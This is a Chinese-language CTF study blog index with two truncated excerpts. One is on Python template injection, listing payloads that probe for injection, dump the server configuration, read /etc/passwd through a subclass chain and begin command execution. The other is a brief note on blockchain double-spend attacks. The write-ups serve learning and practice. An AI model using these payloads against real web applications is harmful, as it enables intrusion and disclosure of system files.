「配枪朱丽叶。」

RootのCTF学习笔记。

Entries from 2019-11-17 to 1 day

Web_python_template_injection(python模板注入)

[1] {{1+1}}测试,存在模板注入: [2] {{config.items()}} 可以查看服务器的配置信息: [3] 读取password信息: {{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}} [4] 命令执行,(ls列出文件): {% for c in [].__class__.__base__.…

Web_python_block_chain (浅学区块链双花攻击)

记笔记,对区块链不是很了解,还是萌萌qwq。 学习参考:区块链与51%算力攻击&2018-DDCTF-mini blockchain 51% (双花)攻击: 在比特币网络里,你有多少钱,不是你说了算,而是大家说了算,每个人都是公证人。”基于算力证明进行维护的比特币网络一直以来有一…